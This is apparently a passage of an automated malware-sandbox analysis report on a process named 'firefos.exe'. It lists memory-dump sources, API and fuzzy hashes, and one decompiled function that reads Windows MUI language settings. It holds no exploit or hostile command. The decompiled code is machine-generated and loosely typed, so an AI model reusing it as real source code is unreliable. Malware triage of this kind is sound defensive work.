                                                                                                                                                              0x0097fdcb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdd7
                                                                                                                                                              0x0097fde3
                                                                                                                                                              0x0097fe06
                                                                                                                                                              0x00991fe7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00991fef
                                                                                                                                                              0x00991ff0
                                                                                                                                                              0x00991ff4
                                                                                                                                                              0x00991ff7
                                                                                                                                                              0x00991ffa
                                                                                                                                                              0x00991ffd
                                                                                                                                                              0x00992000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fe06
                                                                                                                                                              0x0097fde8
                                                                                                                                                              0x0097fdec
                                                                                                                                                              0x0097fdef
                                                                                                                                                              0x0097fdf2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fdf2
                                                                                                                                                              0x0097fdcb
                                                                                                                                                              0x0097fd04
                                                                                                                                                              0x0097fd05
                                                                                                                                                              0x009aec67
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aec6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aec6f
                                                                                                                                                              0x0097fd13
                                                                                                                                                              0x0097fd3c
                                                                                                                                                              0x0097fd40
                                                                                                                                                              0x009aec75
                                                                                                                                                              0x009aec7a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aec8a
                                                                                                                                                              0x009aec8a
                                                                                                                                                              0x009aec90
                                                                                                                                                              0x009aecb2
                                                                                                                                                              0x0097fd73
                                                                                                                                                              0x0097fd73
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd73
                                                                                                                                                              0x009aec95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeca1
                                                                                                                                                              0x009aeca4
                                                                                                                                                              0x009aeca5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeca5
                                                                                                                                                              0x009aec7a
                                                                                                                                                              0x0097fd4a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd6e
                                                                                                                                                              0x0097fd6e
                                                                                                                                                              0x0097fd71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd71
                                                                                                                                                              0x0097fd4a
                                                                                                                                                              0x0097fd21
                                                                                                                                                              0x0098a3a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0098a3a1
                                                                                                                                                              0x0097fd36
                                                                                                                                                              0x0099200b
                                                                                                                                                              0x00992012
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00992018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00992018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0097fd36
                                                                                                                                                              0x0097fe0f
                                                                                                                                                              0x0097fe16
                                                                                                                                                              0x0098a3ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0098a3b3
                                                                                                                                                              0x0098a3b3
                                                                                                                                                              0x0097fe1f
                                                                                                                                                              0x009aed25
                                                                                                                                                              0x009aed86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed91
                                                                                                                                                              0x009aed95
                                                                                                                                                              0x009aed95
                                                                                                                                                              0x009aed9a
                                                                                                                                                              0x009aedad
                                                                                                                                                              0x009aedb3
                                                                                                                                                              0x009aedba
                                                                                                                                                              0x009aedc4
                                                                                                                                                              0x009aedc9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aedcc
                                                                                                                                                              0x009aed2a
                                                                                                                                                              0x009aed55
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed61
                                                                                                                                                              0x009aed66
                                                                                                                                                              0x009aed6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed7d
                                                                                                                                                              0x009aed30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aed3c
                                                                                                                                                              0x009aed43
                                                                                                                                                              0x009aed4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction ID: 4ad579823a9febcb5ed7d2e86e0bde68c128be32bef663ed82efdb4a339ab780
                                                                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction Fuzzy Hash: 7E918E32D0020AEBDF24DF98C8556AEB7B8EF95314F24C47AD459B61A2E7305A81CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Analysis Process: firefos.exe PID: 2840 Parent PID: 2872 firefos.exeCOMMON

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 008B07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008AF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008AFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008AFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008AFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008AFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008AFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 008D8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E008D8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E008D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E008D718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E008D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E008D718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E008D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E008D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E008D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E008D718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008B2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008CE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008BE2A8(_t322,  &_v68, _v16);
								if(E008D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008CE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008BE2A8(_t322,  &_v68, _t236);
								if(E008D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008D718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008B2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008CE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008BE2A8(_v12,  &_v68, _v16);
							if(E008D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008CE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008BE2A8(_t322,  &_v68, _t269);
							if(E008D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008D718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008B2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008CE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008BE2A8(_v12,  &_v68, _v16);
						if(E008D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008CE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008BE2A8(_t322,  &_v68, _t296);
						if(E008D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                              0x008d8788
                                                                                                                                                              0x008d8788
                                                                                                                                                              0x008d8791
                                                                                                                                                              0x008d8794
                                                                                                                                                              0x008d8798
                                                                                                                                                              0x008d879b
                                                                                                                                                              0x008d879e
                                                                                                                                                              0x008d87a1
                                                                                                                                                              0x008d87a4
                                                                                                                                                              0x008d87a7
                                                                                                                                                              0x008d87aa
                                                                                                                                                              0x008d87af
                                                                                                                                                              0x00921ad3
                                                                                                                                                              0x008d8b0a
                                                                                                                                                              0x008d8b0d
                                                                                                                                                              0x008d8b13
                                                                                                                                                              0x008d8b19
                                                                                                                                                              0x008d8b1f
                                                                                                                                                              0x008d8b25
                                                                                                                                                              0x008d8b2b
                                                                                                                                                              0x008d8b31
                                                                                                                                                              0x008d8b37
                                                                                                                                                              0x008d8b3d
                                                                                                                                                              0x008d8b46
                                                                                                                                                              0x008d8b46
                                                                                                                                                              0x008d87c6
                                                                                                                                                              0x008d87d0
                                                                                                                                                              0x00921ae0
                                                                                                                                                              0x00921ae6
                                                                                                                                                              0x00921af8
                                                                                                                                                              0x00921af8
                                                                                                                                                              0x00921afd
                                                                                                                                                              0x00921afe
                                                                                                                                                              0x00921b01
                                                                                                                                                              0x00921b06
                                                                                                                                                              0x00921b06
                                                                                                                                                              0x008d87d6
                                                                                                                                                              0x008d87f2
                                                                                                                                                              0x008d87f7
                                                                                                                                                              0x008d8807
                                                                                                                                                              0x008d880a
                                                                                                                                                              0x008d880f
                                                                                                                                                              0x008d8810
                                                                                                                                                              0x008d8813
                                                                                                                                                              0x008d8818
                                                                                                                                                              0x008d8818
                                                                                                                                                              0x008d882c
                                                                                                                                                              0x008d8831
                                                                                                                                                              0x008d8838
                                                                                                                                                              0x008d8908
                                                                                                                                                              0x008d8920
                                                                                                                                                              0x008d89f0
                                                                                                                                                              0x008d8a08
                                                                                                                                                              0x008d8af6
                                                                                                                                                              0x008d8af6
                                                                                                                                                              0x008d8af8
                                                                                                                                                              0x008d8afb
                                                                                                                                                              0x00921beb
                                                                                                                                                              0x00921beb
                                                                                                                                                              0x008d8b04
                                                                                                                                                              0x00921bf8
                                                                                                                                                              0x00921c0e
                                                                                                                                                              0x00921c13
                                                                                                                                                              0x00921c16
                                                                                                                                                              0x00921c16
                                                                                                                                                              0x00921bf8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d8b04
                                                                                                                                                              0x008d8a0e
                                                                                                                                                              0x008d8a11
                                                                                                                                                              0x008d8a14
                                                                                                                                                              0x008d8a15
                                                                                                                                                              0x008d8a18
                                                                                                                                                              0x008d8a22
                                                                                                                                                              0x008d8b59
                                                                                                                                                              0x008d8a28
                                                                                                                                                              0x008d8a3c
                                                                                                                                                              0x008d8a3c
                                                                                                                                                              0x008d8a42
                                                                                                                                                              0x00921bb0
                                                                                                                                                              0x00921b11
